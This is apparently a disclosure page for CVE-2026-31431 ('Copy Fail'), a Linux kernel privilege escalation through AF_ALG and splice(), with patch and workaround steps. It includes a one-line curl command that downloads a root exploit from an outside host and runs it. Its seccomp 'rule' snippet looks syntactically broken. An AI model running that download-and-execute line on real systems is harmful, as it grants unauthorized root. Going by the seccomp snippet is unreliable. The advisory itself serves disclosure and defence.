Copy Fail Vulnerability Logo

CVE-2026-31431

Copy Fail

A straight-line logic flaw in the Linux kernel that allows any unprivileged user to gain root access.

CVSS: 7.8 (High) | CISA KEV

Understanding the Threat

Discovered: March 23, 2026 (Public: April 29, 2026)
Researcher: Taeyang Lee (Theori / Xint Code)

Copy Fail is a logic flaw in the Linux kernel's algif_aead crypto subsystem. Unlike most Linux privilege escalations that require race conditions or kernel-specific offsets, Copy Fail works reliably in a single execution — no races, no offsets, no kernel debugging.

The vulnerability has existed since 2017, affecting essentially every mainstream Linux distribution shipped since then. A mere 732-byte Python script can root any vulnerable system.

Attack Diagram
Figure 1: Copy Fail Attack Path

🚨 Why This Matters

  • 100% reliable — No race windows, no timing dependencies
  • Since 2017 — Nine years of affected systems
  • 732 bytes — Smaller than most logo images
  • No dependencies — Python 3.10+ stdlib only
  • CISA KEV — Added to Known Exploited Vulnerabilities catalog

Am I Vulnerable?

If you have an unprivileged user account on a Linux system, you can likely gain root. The vulnerability affects any Linux kernel built between 2017 and the patch date.

⚠️ No Simple Detection Method

There is no reliable one-liner to detect if your kernel is vulnerable. The safest assumption is that any kernel from 2017 to the patched date is vulnerable. Check your distribution's security advisories.

Tested Distributions

Xint Code directly verified this exploit works on these distribution/kernel combinations. Any Linux kernel built between 2017 and the patched date is likely vulnerable.

DistributionKernel VersionVerified
Ubuntu 24.04 LTS6.17.0-1007-awsRoot achieved
Amazon Linux 20236.18.8-9.213.amzn2023Root achieved
RHEL 10.16.12.0-124.45.1.el10_1Root achieved
SUSE 166.12.0-160000.9-defaultRoot achieved

Technical Details

The vulnerability exists at the intersection of three kernel changes:

  1. authencesn (2011) — An AEAD wrapper for IPsec that uses the caller's destination buffer as scratch space for ESN byte rearrangement. Writes 4 bytes at offset assoclen + cryptlen past the output boundary.
  2. AF_ALG AEAD (2015) — Added AEAD support to the kernel's userspace crypto interface.
  3. In-place optimization (2017) — Commit 72548b093ee3 changed algif_aead to operate in-place, chaining page cache pages (from splice()) into the writable destination scatterlist.
The Flaw

When using AF_ALG with splice(), page cache pages of any readable file can be delivered to the crypto scatterlist. In-place operation chains these pages into the writable destination. authencesn's scratch write at dst[assoclen + cryptlen] then writes directly into the kernel's page cache of that file — the in-memory version that gets read on execution.

  • Multi-tenant Linux hosts — Shared dev boxes, jump hosts, build servers
  • Kubernetes clusters — Page cache is shared across the host; pod can compromise node
  • CI runners — GitHub Actions, GitLab runners executing untrusted PR code
  • Cloud SaaS — Notebook hosts, agent sandboxes, serverless functions

Download & Test PoC

Terminal
curl -fsSL https://copy.fail/exp -o poc.py && python3 poc.py

SHA256: a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9

How to Fix

1Patch the Kernel

Update your distribution's kernel package to include mainline commit a664bf3d603d. Most major distributions are shipping the fix.

Ubuntu/Debian
sudo apt update && sudo apt upgrade linux-image-generic
RHEL/CentOS/Fedora
sudo dnf update kernel
Amazon Linux
sudo dnf update kernel-6.18

2Workaround: Disable algif_aead (Before Patching)

If you cannot patch immediately, disable the vulnerable kernel module:

Terminal
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif.conf
sudo rmmod algif_aead

What breaks? Almost nothing. AF_ALG is rarely used in practice. It won't affect dm-crypt/LUKS, SSH, kTLS, IPsec, or OpenSSL defaults. Only applications explicitly using afalg engine will be affected.

3Container & Sandbox Mitigation

For untrusted workloads, block AF_ALG socket creation via seccomp regardless of patch state:

seccomp rule
# Block AF_ALG socket creation
scmp_filter_ctx:
- arch: bpf
  filter:
    - deny: 1
      msg_type: AF_ALG
      sysnum: socket
      args: 1

Critical: Reboot Required

Kernel patches require a system reboot to take effect. Simply upgrading the package is not enough — you must restart the server.

Disclosure Timeline

2026-03-23
Reported to Linux kernel security team
2026-03-24
Initial acknowledgment
2026-03-25
Patches proposed and reviewed
2026-04-01
Patch committed to mainline
2026-04-22
CVE-2026-31431 assigned
2026-04-29
Public disclosure
2026-05-01
Added to CISA KEV catalog

Resources